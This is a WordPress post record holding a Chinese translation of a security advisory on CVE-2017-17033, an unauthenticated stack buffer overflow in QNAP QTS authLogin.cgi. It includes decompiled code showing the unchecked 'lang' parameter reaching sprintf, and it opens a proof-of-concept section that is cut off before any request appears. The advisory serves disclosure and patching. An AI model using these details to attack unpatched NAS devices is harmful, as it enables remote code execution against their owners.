{"id":10886,"date":"2017-12-18T14:19:17","date_gmt":"2017-12-18T22:19:17","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/18\/news-4658\/"},"modified":"2017-12-18T14:19:17","modified_gmt":"2017-12-18T22:19:17","slug":"news-4658","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/18\/news-4658\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-QNAP QTS\u672a\u7ecf\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 18 Dec 2017 08:04:57 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3587\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3587');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86QNAP QTS\u7684\u4e00\u4e2a\u5185\u5b58\u635f\u574f\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u4f1a\u9020\u6210QNAP QTS 4.3.x\u548c4.2.x\u7248\u672c\uff08\u5305\u62ec4.3.3.0299\uff09\u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002<\/p>\n<p>\u5a01\u8054\u901a\u79d1\u6280\uff08QNAP Systems, Inc\uff09\u4e13\u6ce8\u4e8e\u4e3a\u4f01\u4e1a\uff0c\u4e2d\u5c0f\u578b\u4f01\u4e1a\uff0cSOHO\u548c\u5bb6\u5ead\u7528\u6237\u63d0\u4f9b\u6587\u4ef6\u5171\u4eab\uff0c\u865a\u62df\u5316\uff0c\u5b58\u50a8\u7ba1\u7406\u548c\u76d1\u63a7\u5e94\u7528\u7684\u7f51\u7edc\u89e3\u51b3\u65b9\u6848\u3002 QNAP QTS\u662f\u6807\u51c6\u7684\u667a\u80fdNAS\u64cd\u4f5c\u7cfb\u7edf\uff0c\u652f\u6301\u6240\u6709\u6587\u4ef6\u5171\u4eab\uff0c\u5b58\u50a8\uff0c\u5907\u4efd\uff0c\u865a\u62df\u5316\u548c\u591a\u5a92\u4f53QNAP\u8bbe\u5907\u3002<br \/> <span id=\"more-3587\"><\/span><br \/> <strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><br \/> \u4e00\u4f4d\u5b89\u5168\u7814\u7a76\u8005TRUEL IT\uff08@truel_it\uff09\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> QNAP\u5df2\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u5e76\u56de\u590d\uff1a\u201c\u6211\u4eec\u5df2\u7ecf\u786e\u8ba4\u8fd9\u4e2a\u95ee\u9898\u4e0e\u6700\u8fd1\u7684\u53e6\u4e00\u4efd\u62a5\u544a\u76f8\u540c\uff0c\u5e76\u5df2\u7ecf\u53d1\u5e03\u4e86CVE-2017-17033\u3002<\/p>\n<p>\u5c3d\u7ba1\u8fd9\u4efd\u62a5\u544a\u662f\u91cd\u590d\u7684\uff0c\u4f46\u6211\u4eec\u4ecd\u7136\u4f1a\u5728\u5373\u5c06\u53d1\u5e03\u7684\u5b89\u5168\u516c\u544a\u4e2d\u5bf9\u4e24\u4f4d\u62a5\u9001\u8005\u8868\u793a\u611f\u8c22\u3002<\/p>\n<p>\u540c\u65f6\uff0c\u5728\u5373\u5c06\u53d1\u5e03\u7684QTS 4.2.6\u548c4.3.3\u7248\u672c\u4e2d\u5c06\u4fee\u590d\u8be5\u6f0f\u6d1e\u3002\u201d<\/p>\n<p>CVE: CVE-2017-17033<\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><br \/> \u7531\u4e8e\u7f3a\u4e4f\u9002\u5f53\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u53ef\u4ee5\u901a\u8fc7\u7279\u5236\u7684HTTP\u8bf7\u6c42\u6ea2\u51fa\u5806\u6808\u7f13\u51b2\u533a\u5e76\u52ab\u6301\u63a7\u5236\u6d41\u4ee5\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002<\/p>\n<p>authLogin.cgi\u8d1f\u8d23\u663e\u793a\u6765\u81eaWeb\u754c\u9762\u7684\u7cfb\u7edf\u4fe1\u606f\uff0c\u5e76\u4e14\u5305\u542b\u5728\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\u8fdb\u884c\u65e0\u9650\u5236\u7684sprintf\u8c03\u7528\u4e2d\u3002<\/p>\n<p>authLogin.cgi\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u4f4d\u4e8eQTS\u6587\u4ef6\u7cfb\u7edf\u7684\/home\/httpd\/cgibin\/\u76ee\u5f55\u4e2d\uff0c\u53ef\u901a\u8fc7\u8bf7\u6c42\u7aef\u70b9\/cgi-bin\/sysinfoReq.cgi\u8fdb\u884c\u8bbf\u95ee\u3002<br \/> \u8be5\u4e8c\u8fdb\u5236\u6587\u4ef6\u662fQTS\u7684\u4e00\u90e8\u5206\uff0c\u5e76\u5145\u5f53\u51e0\u4e2a\u529f\u80fd\u7684\u5305\u88c5\u5668\u3002<\/p>\n<p>\u6613\u53d7\u653b\u51fb\u7684\u8c03\u7528\u4f4d\u4e8ehandle_qpkg()\uff080x1C680\uff09\u51fd\u6570\u4e2d\uff0c\u8be5\u51fd\u6570\u7531handle_sysInfoReq()\uff080x1D398\uff09\u8c03\u7528\uff0c\u4ee5\u663e\u793a\u5f53\u524d\u7cfb\u7edf\u4fe1\u606f\uff08\u578b\u53f7\u540d\u79f0\uff0c\u56fa\u4ef6\u7248\u672c\uff0cecc\uff09\u3002<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005.png\" data-slb-active=\"1\" data-slb-asset=\"1628517949\" data-slb-internal=\"0\" data-slb-group=\"3587\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png\" alt=\"\" width=\"207\" height=\"300\" class=\"alignnone size-medium wp-image-3566\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png 207w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005.png 240w\" sizes=\"auto, (max-width: 207px) 100vw, 207px\" \/><\/a><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a383ee46f24d364061949\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8230;  if ( !strcmp(&#8220;mediaGet.cgi&#8221;, endpoint) )  {   handle_mediaGet(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;sysinfoReq.cgi&#8221;, endpoint) )  {   handle_sysInfoReq(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;authLogout.cgi&#8221;, endpoint) )  {   handle_authLogout(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;cgi.cgi&#8221;, endpoint) )  {   handle_cgi(cgi_input);   goto LABEL_EXIT;  }  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>\u901a\u8fc7\u5411sysinfoReq.cgi\u53d1\u9001\u4e00\u4e2aHTTP\u8bf7\u6c42\uff0chandle_sysInfoReq()\uff080x1D398\uff09\u51fd\u6570\u88ab\u89e6\u53d1\uff0c\u5e76\u4e14\u6839\u636e\u63d0\u4f9b\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u5904\u7406\u4e0d\u540c\u7684\u8fdb\u7a0b\u6b65\u9aa4\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a383ee46f254821019712\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int handle_sysinforeq(int http_input)  {   &#8230;   qpkg_value = CGI_Find_Parameter(http_input, (int)&#8221;qpkg&#8221;);   if (qpkg_value &amp;&amp; *( qpkg_value + 4) )   {   handle_qpkg(http_input, 1);   goto LABEL_EXIT;   }   &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f254821019712-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f254821019712-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f254821019712-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f254821019712-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f254821019712-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f254821019712-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_sysinforeq<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f254821019712-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f254821019712-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CGI_Find_Parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-s\">&#8220;qpkg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f254821019712-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_qpkg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f254821019712-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">goto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LABEL_EXIT<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f254821019712-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f254821019712-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>\u5982\u679c\u63d0\u4f9b\u4e86qpkg HTTP\u53c2\u6570\uff0c\u5219\u8c03\u7528handle_qpkg()\uff080x1C680\uff09\u51fd\u6570\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a383ee46f257606614603\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int handle_qpkg(int http_input, int arg2)  {   &#8230;   Get_All_QPKG_Info((int)&amp;all_qpkg_info);   &#8230;   http_param_lang_p = CGI_Find_Parameter(http_input, (int)&#8221;lang&#8221;);   if ( http_param_lang_p )   sprintf(&amp;xml_file_p, &#8220;\/home\/httpd\/RSS\/rssdoc\/qpkgcenter_%s.xml&#8221;, http_param_lang_p + 4);   &#8230;   return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f257606614603-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f257606614603-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f257606614603-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f257606614603-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f257606614603-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f257606614603-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_qpkg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arg2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f257606614603-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f257606614603-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Get_All_QPKG_Info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">all_qpkg_info<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f257606614603-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang_p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CGI_Find_Parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-s\">&#8220;lang&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang<\/span><span class=\"crayon-sy\">_<\/span>p<span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f257606614603-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">xml_file_p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/home\/httpd\/RSS\/rssdoc\/qpkgcenter_%s.xml&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang_p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f257606614603-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f257606614603-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>handle_qpkg()\u51fd\u6570\u4e0d\u4f1a\u9a8c\u8bc1\u7528\u6237\u63d0\u4f9b\u7684lang HTTP\u53c2\u6570\u503c\u3002<\/p>\n<p>\u6b63\u5982\u4e0a\u9762\u7684\u4ee3\u7801\u8def\u5f84\u6240\u793a\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u4e3a\u6240\u8ff0\u53c2\u6570\u63d0\u4f9b\u4efb\u610f\u5927\u5c0f\u7684\u503c\uff0c\u7136\u540e\u901a\u8fc7sprintf()\u51fd\u6570\u8c03\u7528\u5c06\u5176\u8fde\u63a5\u5230\u9759\u6001\u5927\u5c0f\uff08\u5806\u6808\uff09\u7f13\u51b2\u533a\u4e0a\u7684\u73b0\u6709\u5b57\u7b26\u4e32\u3002<\/p>\n<p><strong>\u6f0f\u6d1e\u8bc1\u660e<\/strong><br \/> \u901a\u8fc7\u53d1\u9001\u4ee5\u4e0bPOST\u8bf7\u6c42\uff0c\u6211\u4eec\u5c06\u4f7f\u5806\u6808\u6ea2\u51fa\u5e76\u7528XXXX\u8986\u76d6qpkg_all_info\u7f13\u51b2\u533a\u7684\u503c\uff0c\u5e76\u7528YYYY\u8986\u76d6handle_qpkg()\u53c2\u6570\u8fd4\u56de\u5730\u5740\u7684\u503c\uff0c\u4ece\u800c\u9020\u6210\u5d29\u6e83\u3002<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a383ee46f25a755842548\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 